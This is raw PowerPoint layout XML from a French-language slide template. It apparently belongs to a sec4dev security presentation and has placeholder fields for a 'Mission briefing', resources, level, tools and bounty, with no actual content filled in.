              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0273749-7AB1-A48C-E64C-1177D13D9E73}"/>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3" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2AE80E6-A691-3B15-8788-A2420FBDB146}"/>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4" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8AB2FC-9E01-C64D-6166-0BDCDCAAD5C4}"/>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2" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15832438-844E-4A76-A4FA-F02F66C5AD18}"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54452083-4437-905A-094C-3EAE029B4D6D}"/>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B7A08D7-2B7C-E50E-2292-A8C617C2DCE9}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C44432-E13A-C021-30C1-6142C0404858}"/>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16" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E5192B-458A-511B-5880-DBCD95E2BFCD}"/>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17" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{788CA74A-9E15-46CB-EB45-9AB1D19DC02F}"/>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18" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F5846D-E25D-4B4D-B712-2768CFB6C2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1288E9A-4676-3186-C4FC-B2F24578C15D}"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16434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marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="188640"/>
            <a:ext cx="8503057" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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8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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur droit 7"/>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1D7283B-4442-04D0-D497-5C22F5633A3A}"/>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4640ADC-8184-917D-BECC-67DEC3E6D074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8762163" y="6652009"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1A06F8-DE9D-399F-C916-B68A149584D3}"/>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4" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9425A988-6526-3A7E-7DFA-A493F6303F2C}"/>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5" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1514C46-67FC-733E-9391-B3AC3F1AFEB6}"/>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16" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD5DD792-225A-78F0-5EA4-D4D02CF249C1}"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A57D48-A7ED-349D-E7CF-B2F46C3F24F8}"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{152F2AA6-E0D2-9499-EA65-5C1884F7B46C}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B36498-65EC-DA7A-5422-DA057B3EFFA3}"/>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20" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11108BF-2F09-0904-3BFE-853DE0D6EDA7}"/>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21" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB525474-D74D-4A9F-1BB5-F3119341F4F3}"/>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2" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2EF824-BA7B-FE2D-29A7-C7116C8AD1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18730" y="188640"/>
            <a:ext cx="8503057" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0" dirty="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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8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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur droit 7"/>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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl3pPr>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Mission briefing :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>AAAAA :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://link.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>AAAAA :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://link.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="5569860"/>
            <a:ext cx="915635" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" err="1"/>
              <a:t>Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805734" y="5569860"/>
            <a:ext cx="924164" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410156" y="5569860"/>
            <a:ext cx="1120820" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Bounty :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.206.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156" y="5500526"/>
            <a:ext cx="508000" cy="50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Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A362ED30-33D9-8209-DFCF-2BD7C87D96C9}"/>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3" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9380D804-68EA-1F92-3201-A83D7EDEFB60}"/>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4" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8C2D59-4827-4672-3CF3-F2D42ADABFEB}"/>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5" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81224209-BE3E-3B71-6B43-941166E3C65E}"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCFAF19-1C7F-9C2C-27BF-E7A92E25C349}"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E86121B-7142-9438-413E-45F28BBFEA39}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A492E4-27A6-622A-79DB-92050DEE9465}"/>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21" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7B22D4-0F8B-B25A-312F-6067F4A62C38}"/>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22" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBCE83E6-0A42-40EA-33B4-E607194CDF4A}"/>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3" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD948DB4-0D1E-5037-5C45-2CD946F1197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9912B78-D544-8CDE-2FD8-CEA1D1B5CBBF}"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149807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phics">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418730" y="1340769"/>
            <a:ext cx="8506080" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">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Heading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1654027"/>
            <a:ext cx="8506080" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:no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Subheading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="188640"/>
            <a:ext cx="8503057" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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4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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connecteur droit 9"/>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 name="Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E56901-30B7-69E6-C262-00409E93D106}"/>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3" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D16EAA-5FD0-E0E3-7299-FEE6BC8FE378}"/>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4" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AD8A2E-FAC4-AB6C-B00B-E10C04E60FDD}"/>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5" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D026B0FC-AF5F-FF59-6470-4EDCE86C4899}"/>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eur droit 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061596D4-E6A1-A3F8-CA3A-7FFE3BA91BB6}"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501AAAD2-F9DD-8C28-40EF-FAAEC02FD449}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A5067ED-83D3-2F5F-9CA8-89443A62430C}"/>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18" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB617D1-8BAD-689A-AA20-0A38135657F7}"/>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19" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E13CC705-D075-8BE7-0E28-6CB97F7EC871}"/>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0" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21DC19A5-1C8C-E046-0BEB-A46657741E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AE63EDB-C211-8293-7899-E66AD931E0CB}"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353837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Comparison 2 Col">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18729" y="2104948"/>
            <a:ext cx="4040188" cy="3951288"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870191" y="2104948"/>
            <a:ext cx="4041775" cy="3951288"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418731" y="1340769"/>
            <a:ext cx="4040187" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="14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Heading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418731" y="1654027"/>
            <a:ext cx="4040187" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:no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Subheading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870191" y="1340769"/>
            <a:ext cx="4040187" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">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Heading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870191" y="1654027"/>
            <a:ext cx="4040187" cy="403757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:no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Subheading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="188640"/>
            <a:ext cx="8503057" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="667835"/>
            <a:ext cx="8506081" cy="381000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:defRPr>
